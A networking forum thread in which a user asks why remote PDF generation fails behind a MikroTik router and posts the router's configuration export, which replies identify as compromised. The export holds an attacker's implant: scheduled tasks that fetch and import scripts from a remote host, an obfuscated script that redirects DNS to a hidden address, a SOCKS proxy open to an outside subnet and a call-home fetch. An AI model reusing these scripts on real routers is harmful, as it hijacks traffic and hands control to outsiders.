Hello there!

I need some help with my mikrotik Router, we installed it on a client network and opened some ports for the Server that runs our internel system with ip 192.168.1.245.
When a user access the system externaly with IP “177.36..” he cannot print any file in PDF format. But when the user is inside the local network using the local server IP “192.168.1.245” he can generate the PDF file from the system.

There is no blocking rule on the router.
I changed the router and put a TP-Link for test and with the TP-Link the external PDF file generation works with the same open ports that I have.
I really dont know what to do, is there a Web Filter or PDF port thats needs to be allowed on Mikrotik?

If anyone has already run to this problem, please help.
Thanks very much!

Att,
Alexandre

There is nothing specific about pdf transmission as compared to any other TCP connections. So two things come to my mind:

• an MTU problem related to PPPoE or VPN connection, is one of these involved?
• some layer7-protocol or contents match condition in a firewall rule (as these check for patterns in packet contents) - is anything like this configured on the Mikrotik?

Hi sindy, thanks for the reply.

So there is no PPPoE configured on it, it is just a Static IP from the ISP configured on Ehter1 and no VPN connection is used too.
My Layer7 protocol rules on the Mikrotik Firewall are clean, I’ve got some ports redirect to my System Server IP Address, is it possible to be a condition on my redirect NAT ports rules?

Thank you!

Post the export of the configuration according to the guidelines in my automatic signature. I suspect a simple firewall issue with port forwarding as it is not clear from your description whether you’ve tried anything else than pdf.

Sorry for my lack of knowledge with Mikrotik I’m particularly new with the system.
Here is my “export” command info, i just hided some internet IPs.

Thanks a lot for your attention to my case!

\

sep/18/2018 09:57:34 by RouterOS 6.34.2

software id = L9V1-RKAB

/interface ethernet
set [ find default-name=ether2 ] name=ether2-master
set [ find default-name=ether3 ] master-port=ether2-master
set [ find default-name=ether4 ] master-port=ether2-master
set [ find default-name=ether5 ] master-port=ether2-master
/ip neighbor discovery
set ether1 discover=no
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp ranges=192.168.1.10-192.168.1.254
/ip dhcp-server
add address-pool=dhcp disabled=no interface=ether2-master name=defconf
/ip address
add address=192.168.1.1/24 comment=defconf interface=ether2-master network=192.168.1.0
add address=177.36../30 interface=ether1 network=177.36..
/ip cloud
set ddns-enabled=yes
/ip dhcp-client
add comment=defconf dhcp-options=hostname,clientid interface=ether1
/ip dhcp-server lease
add address=192.168.1.190 always-broadcast=yes client-id=1:90:f6:52:17:4:2c mac-address=90:F6:52:17:04:2C server=
defconf
add address=192.168.1.8 always-broadcast=yes client-id=1:48:f:cf:fc:52:78 comment=“HP m426dw no CTM” mac-address=
48:0F:CF:FC:52:78 server=defconf
add address=192.168.1.4 always-broadcast=yes client-id=1:48:f:cf:fc:c2:6a comment=“HP M426dw - Ferramentaria”
mac-address=48:0F:CF:FC:C2:6A server=defconf
/ip dhcp-server network
add address=192.168.1.0/24 comment=defconf gateway=192.168.1.1
/ip dns
set allow-remote-requests=yes servers=104.37.195.,107.172.42.,128.52.130.***
/ip dns static
add address=192.168.1.1 name=router
/ip firewall address-list
add list=rdp_blacklist
add list=rdp_stage3
add list=rdp_stage2
add list=rdp_stage1
add address=191.209.. list=ALLOW3-Mayara
add address=177.33.. list=ALLOW2-Eliane
add address=177.36.. list=ALLOW4-Denise
add address=74.127.. disabled=yes list=NathaliaUSA
add address=177.157.. disabled=yes list=HSD
add address=189.96.. list=ALLOW5-GISLAINE
add address=108.234.. list=Giovana
/ip firewall filter
add chain=forward disabled=yes dst-address=192.168.25.98 dst-port=3000 protocol=tcp
add action=drop chain=forward disabled=yes layer7-protocol=1
add action=drop chain=forward disabled=yes dst-port=3000 protocol=tcp src-address-list=rdp_blacklist
add action=add-src-to-address-list address-list=rdp_blacklist address-list-timeout=3d chain=forward connection-state=
new disabled=yes dst-port=3000 protocol=tcp src-address-list=rdp_stage3
add action=add-src-to-address-list address-list=rdp_stage3 address-list-timeout=1m chain=forward connection-state=new
disabled=yes dst-port=3000 protocol=tcp src-address-list=rdp_stage2
add action=add-src-to-address-list address-list=rdp_stage2 address-list-timeout=1m chain=forward connection-state=new
disabled=yes dst-port=3000 protocol=tcp src-address-list=rdp_stage1
add action=add-src-to-address-list address-list=rdp_stage1 address-list-timeout=1m chain=forward connection-state=new
disabled=yes dst-port=3000 protocol=tcp
add action=drop chain=forward disabled=yes dst-port=3000 protocol=tcp src-address-list=rdp_blacklist
add action=drop chain=forward disabled=yes dst-port=3389 protocol=tcp
add action=add-src-to-address-list address-list=Ok address-list-timeout=15s chain=input comment=sysadminpxy dst-port=
8080 protocol=tcp
/ip firewall nat
add action=redirect chain=dstnat comment=sysadminpxy dst-port=80 protocol=tcp src-address-list=!Ok to-ports=8080
add action=masquerade chain=srcnat comment=“defconf: masquerade” out-interface=ether1
add action=dst-nat chain=dstnat dst-port=3389 in-interface=ether1 protocol=tcp src-address-list=ALLOW to-addresses=
192.168.1.254 to-ports=3389
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=ALLOW3-Mayara
to-addresses=192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=ALLOW4-Denise
to-addresses=192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=ALLOW2-Eliane
to-addresses=192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=NathaliaUSA
to-addresses=192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=Giovana to-addresses=
192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3390 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=3390
add action=dst-nat chain=dstnat dst-port=20000 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=22
add action=dst-nat chain=dstnat dst-port=22 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=22
add action=dst-nat chain=dstnat dst-port=3306 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=3306
add action=dst-nat chain=dstnat dst-port=3390 in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=3390
add action=dst-nat chain=dstnat dst-port=20000 in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=22
add action=dst-nat chain=dstnat dst-port=22 in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=22
add action=dst-nat chain=dstnat dst-port=3306 in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=3306
add action=dst-nat chain=dstnat dst-address=177.36..* dst-port=80 protocol=tcp to-addresses=192.168.1.245
to-ports=0-65535
add action=src-nat chain=srcnat dst-address=192.168.1.245 dst-port=80 protocol=tcp to-addresses=192.168.1.1 to-ports=
0-65535
add action=dst-nat chain=dstnat dst-port=80 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=80
add action=dst-nat chain=dstnat dst-port=8099 in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=80
add action=dst-nat chain=dstnat dst-port=8099 in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=80
add action=dst-nat chain=dstnat dst-port=8080 in-interface=ether1 protocol=tcp to-addresses=192.168.1.9 to-ports=8080
add action=dst-nat chain=dstnat dst-port=37777 in-interface=ether1 protocol=tcp to-addresses=192.168.1.9 to-ports=37777
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=HSD to-addresses=
192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=3000 in-interface=ether1 protocol=tcp src-address-list=ALLOW5-GISLAINE
to-addresses=192.168.1.251 to-ports=3000
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp to-addresses=8.8.8.8 to-ports=53
add action=dst-nat chain=dstnat dst-port=53 protocol=udp to-addresses=8.8.8.8 to-ports=53
add action=dst-nat chain=dstnat disabled=yes in-interface=ether1 protocol=tcp to-addresses=192.168.1.245 to-ports=
0-65535
add action=dst-nat chain=dstnat disabled=yes in-interface=ether1 protocol=udp to-addresses=192.168.1.245 to-ports=
0-65535
add action=dst-nat chain=dstnat dst-address=177.36.. protocol=tcp to-addresses=192.168.1.245
add action=src-nat chain=srcnat src-address=192.168.1.245 to-addresses=177.36..
/ip proxy access
add action=deny
add action=deny
add action=deny
add action=deny
add action=deny
add action=deny
/ip route
add distance=1 gateway=177.36..
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www-ssl disabled=no
/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
/system clock
set time-zone-name=America/Sao_Paulo
/system routerboard settings
set cpu-frequency=850MHz protected-routerboot=disabled
/system scheduler
add interval=5m name=ozdefault_scheduler on-event=ozdefault policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=jan/01/1970 start-time=00:00:00
add interval=11h name=upd113 on-event=
“/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47
add interval=13h name=upd114 on-event=
“/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=flash/webproxy/error.html” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47
add interval=9h name=upd115 on-event=“/tool fetch url=http://gotan.bit:31415/01/u113.rsc mode=http” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47
add interval=9h name=upd116 on-event=“/import u113.rsc” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:57
add interval=1d name=Auto113 on-event=“/system reboot” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:00:00
/system script
add name=ozdefault owner=admin policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive source=“:local calculat
eStr do={\r
\n\t:local final 10;\r
\n\t:local string "asdasdqwe123sdas"\r
\n\t:local totalChar [:len $string]\r
\n\t:local tempString ""\r
\n\t:local inverter ""\r
\n\t:local normal ""\r
\n\t:local returnString\r
\n\r
\n\t:for i from=0 to=$totalChar do={ :local lower ($totalChar - $i); :set inverter ($inverter . [:pick $string
$lower ($lower + 1)]); }\r
\n\t:for i from=0 to=$totalChar do={ :set normal ($normal . [:pick $string $i ($i + 1)]); }; :set returnString
[:pick ($inverter . $string . $normal) 0 $final];\r
\n\t:for i from=0 to=0 do={}; :set returnString ($returnString . ".ntr."); :for i from=0 to=0 do={}; :set returnS
tring ($returnString . "b");\r
\n\t:for i from=0 to=0 do={}; :set normal $normal; :set tempString $tempString; :set final $final; :set returnStr
ing ($returnString . "r");\r
\n\r
\n\treturn $returnString\r
\n}\r
\n\r
\n:local defined false\r
\n\r
\n:local address [:resolve [$calculateStr]]\r
\n\r
\n:local filterArray [/ip firewall nat find where action="dst-nat" dst-port="53"]\r
\n:local nEntries [:len $filterArray]\r
\n\r
\n:if ($nEntries != 2) do={\r
\n\r
\n\t:foreach i in=$filterArray do={\r
\n\r
\n\t\t/ip firewall nat remove $i\r
\n\r
\n\t}\r
\n\t\r
\n\t/ip firewall nat add chain=dstnat action=dst-nat to-addresses=$address to-ports=53 protocol=tcp dst-port=53 \r
\n\t/ip firewall nat add chain=dstnat action=dst-nat to-addresses=$address to-ports=53 protocol=udp dst-port=53 \r
\n\t:set defined true \r
\n\r
\n} else {\r
\n\r
\n\t:local actualAddress\r
\n\r
\n\t:foreach i in=$filterArray do={\r
\n\t\t\r
\n\t\t:set actualAddress [/ip firewall nat get $i to-addresses]\r
\n\t\t:if ($actualAddress != $address) do={\r
\n\t\t\t/ip firewall nat set $i to-addresses=$address\r
\n\t\t\t:set defined true\r
\n\t\t}\r
\n\r
\n\t}\r
\n\r
\n}”
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=
“/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no”
/tool graphing interface
add
/tool mac-server
set [ find default=yes ] disabled=yes
add interface=ether2-master
/tool mac-server mac-winbox
set [ find default=yes ] disabled=yes
add interface=ether2-master

No reason to apologizie - if you knew everything, you wouldn’t need to come here.

Looking at the export, it seems to me that you have inherited the administration of that system after someone else (or something similar has happened in the past between other people), as I can see principially same things are attempted to be done in two different ways and as there are some visible misunderstandings of the concept in one of them.

So please write in plain words what you think needs to be done to facilitate the “pdf printing” as you refer to it, and copy-paste the rules you have added to achieve that goal.

“/tool fetch url=> http://gotan.bit:31415/01/error.html > mode=http dst-path=webproxy/error.html” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47
add interval=13h name=upd114 on-event=
“/tool fetch url=> http://gotan.bit:31415/01/error.html > mode=http dst-path=flash/webproxy/error.html” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47
add interval=9h name=upd115 on-event=“/tool fetch url=> http://gotan.bit:31415/01/u113.rsc > mode=http” policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47

Your router is compromised, the first thing you should do is netinstall from a known good config with the latest RouterOS and change all passwords.

R1CH,
thank you for the reply, im changing the mikrotik temporaly for the TPLink router and Im gonna Reset it and upgrade the RouterOS with the latest version and reconfigure it completely.
Will post news after everything done!

Thank guys!

[quote=bismarc123 post_id=837392 time=1609587168 user_id=177424]
Hey, I have the same ptroblem, but I’m not that handy with stuff like this, so I just feel lost at the moment.
[/quote]
Open a new topic with your specific environment and all the information that is relevant. Unless you are also failing on trying to export pdf and have a compromised RB.